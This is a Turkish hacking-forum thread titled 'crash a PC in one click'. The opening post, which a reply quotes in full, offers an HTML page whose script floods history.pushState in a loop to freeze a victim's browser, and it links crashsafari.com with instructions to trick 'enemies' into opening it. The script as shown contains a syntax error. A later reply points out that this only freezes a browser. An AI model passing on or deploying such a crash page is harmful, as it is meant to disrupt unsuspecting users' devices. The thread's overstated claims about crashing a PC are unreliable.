Tek tıkta PC çökertme

CraweL

Üye
19 Ağu 2017
220
0
Bir cogunuz dusmanlarınıza iyi bir hamle yapmak istersiniz biraz eglence olsun demi istedigi kadar denesin tıkladıgı anda kontrol devre dısı gorev yoneticisi falan acsın kapatmayı denesın cozum bulamayacak ama ta ki reboot atana kadar bunun icin bir arastırma yaptım sonuc uygulanıyor reboot atıldıgında duzeliyor ama :inv

bu linke sakın tıklamayın kurbana bunu yediriceksiniz.
crashsafari.com

Kod:
<!DOCTYPE html>
<html>
<body>
<h1>What were you expecting?</h1>

<script>
var total = --;
for( var i = 0; i < 100000; i++ ) {
total = total + i.toString();
history.pushState(0,0, total );
}
</script>
</body>
</html>

mArgoN

Yeni üye
24 Ağu 2017
18
0
Dostum bu konularda biraz Fransız kalıyorumda, rica etsem cok az daha acar misin. Kodu fln ne yapıcaz. Tesekkurler...

S.A.B.E.R!/

Basın&Medya Ekibi Deneyimli
14 Mar 2017
4,169
566
26
Sakarya
Bir cogunuz dusmanlarınıza iyi bir hamle yapmak istersiniz biraz eglence olsun demi istedigi kadar denesin tıkladıgı anda kontrol devre dısı gorev yoneticisi falan acsın kapatmayı denesın cozum bulamayacak ama ta ki reboot atana kadar bunun icin bir arastırma yaptım sonuc uygulanıyor reboot atıldıgında duzeliyor ama :inv

bu linke sakın tıklamayın kurbana bunu yediriceksiniz.
crashsafari.com

Kod:
<!DOCTYPE html>
<html>
<body>
<h1>What were you expecting?</h1>

<script>
var total = --;
for( var i = 0; i < 100000; i++ ) {
total = total + i.toString();
history.pushState(0,0, total );
}
</script>
</body>
</html>

Bu meşhur anakart yakan trojan mı?

barankara

Katılımcı Üye
10 Tem 2014
499
0
PC ÇÖKERTME diye okuduğum zaman gözlerim doldu kendimi 2005'te hissettim.Yahu kardeşim bi çağ atlayın be.Allah rızası için bak lütfen.Browser dondurmayla olmaz ki ama.Hadi bakalım.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.